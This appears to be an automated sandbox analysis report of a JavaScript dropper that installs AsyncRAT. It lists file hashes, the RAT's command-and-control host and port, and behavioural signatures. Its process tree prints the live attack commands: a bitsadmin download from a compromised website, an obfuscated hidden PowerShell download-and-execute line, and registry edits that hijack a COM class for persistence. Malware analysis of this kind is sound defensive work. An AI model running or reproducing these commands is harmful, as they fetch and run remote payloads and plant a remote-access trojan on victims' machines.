Analysis
-
max time kernel
121s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
22-03-2023 19:23
General
-
Target
28-55-63-12.JS.js
-
Size
120KB
-
MD5
c9d2d5758ea0bc1c82bf466b68fad4ee
-
SHA1
30daf976e08feb0ecbb6a10958d09a6e2da2bcf8
-
SHA256
b2aab26d36c289c0922a8cde64767571c9fec6daa765caee23a9b2c1fe7c0b17
-
SHA512
20f3509e7cb2ebf00e1bd0a91c4fab0981cf8b90cb088abde8da63b36f785471466503edd820acbc033fdc11832ae8e3af3d9d09257f1cd0ac19d28bc0bf983a
-
SSDEEP
384:xXWXWXWXWXWXWXWXWXWXWXWXEXWXWXWXWXWXWXWXWXWXWXWX0XWXWXWXWXWXWXWZ:i/dNx
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
Cairo
admincairo.linkpc.net:7707
AsyncMutex_move
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Modifies registry class 4 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 30 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28-55-63-12.JS.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://theemirateshills.com//wp-includes/js/information.txt C:\Users\Admin\AppData\Local\TempVB2⤵
- Download via BitsAdmin
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\TempVB2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI $FRJX36='IeX(NeW-OBJeCT NeT.W';$GSX='eBCLIeNT).DOWNLO';Sleep 1;[BYTe[]];Sleep 3;$SCV='UGYDS(''https://theemirateshills.com//wp-includes/js/moos2.png'')'.RePLACe('UGYDS','ADSTRING');Sleep 1;IeX($FRJX36+$GSX+$SCV);IEx([IO.File]::$a($T))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI $FRJX36='IeX(NeW-OBJeCT NeT.W';$GSX='eBCLIeNT).DOWNLO';Sleep 1;[BYTe[]];Sleep 3;$SCV='UGYDS(''https://theemirateshills.com//wp-includes/js/moos2.png'')'.RePLACe('UGYDS','ADSTRING');Sleep 1;IeX($FRJX36+$GSX+$SCV);IEx([IO.File]::$a($T))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.ps1'"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.vbs"6⤵
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\YPSPPQWKQDKPVWZHQCIIQZ.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\YPSPPQWKQDKPVWZHQCIIQZ.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706B
MD59999b95750b6f959dd0c3d4c7954f0ee
SHA122c4a26421cca8e30640ba82e0ef8b15d2a6237e
SHA2569e728f939da712b6b01a3fab1965e4ae4c4f5cb58a25c948d29cf3c8dcc1dab3
SHA512216408cc11036e3e62751962a850f53051e3804fdcc58ccd82b78d94952101bed9cae208e65508b167cfe2a6e71d045bd7daf391f39223c3029a65b2916eef88
-
Filesize
3KB
MD54aa84ac8d8e1cb6f117e22afa522c7db
SHA17a8b3f44f002409efff5a108be66018547879531
SHA25697cb4dd1f0737cf5628bcf0fe1ab310765ba991b00a5520d53e1b1afef0e874b
SHA512b88a472648e2a9810b1f57a62414055a947549b8645f2bf407404ed69c2b8043b942ef775050791bd482ab0b13ee6192e3b638eef77cd9c4fdec3e08ae306cca
-
Filesize
1KB
MD5ffe187f86e83d51950c02f4dbbaa90f8
SHA1b95682b36a27379ccd792d27a16967e881f4646d
SHA2569bf3960d7875ec6f1547a480bc22dd0040d715620377422ca3aef9f0536ea093
SHA512e6bac9e3c25707fef9ea7491bd69428fa2ee322bbc40e9b024fbb217120163dbb1e937f59bfd51e96f887fbc944aba3d3c59e8600900a1443733cd52af7db026
-
Filesize
680KB
MD5a0a0a7ebc8ad48aaf27cd5bcc77e387c
SHA13d84c33469f32a6bdc6158e36d5961d41de36600
SHA256ad0d6f8a3e0d461e59b6288f417092e3f9d4f39706f51711d5597708d187117c
SHA5121f74b19ebf00756dcc80c8381cd2a3f920731a69158752620a58b18acf3879f26abbc8e1931adcba2afd25639cf618fb3f9643871460bbbe0897f047e73e660e
-
Filesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
Filesize
1KB
MD5e9334471cfa4286c5d38fd73f401a126
SHA12e21574c51b3b72ac7fd659c056bc1670407d54b
SHA256976e2a80c6ff22329214f5da7b69e68e107fdccb8d1cc722a5153052aac59995
SHA512854f6074125bb7e077e77b0125089e622715ef30069453653ea474972a9768621065ed0fe32e75ee22d0e4eaf075baf811b9aebd4e707854c6379e0854383fd1
-
Filesize
1KB
MD531cc3034d46ced022839bf0308e7f14b
SHA1653e3b33306205109a6ba8667224f2da6b038046
SHA25633de6de3be3190b3a7f28d7e72c54cd5b411cb507ce2c52633cf499f5f88e323
SHA512decd0cdd917f30b6bafc583fe2821566e5b4e30913676feb7ad6e0f8f64cd554e3386aa1c28f531ff37e6b58041740ab6d5931c51b3da35446c2f1741df8769f
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
624KB
-
Filesize
408KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
88KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB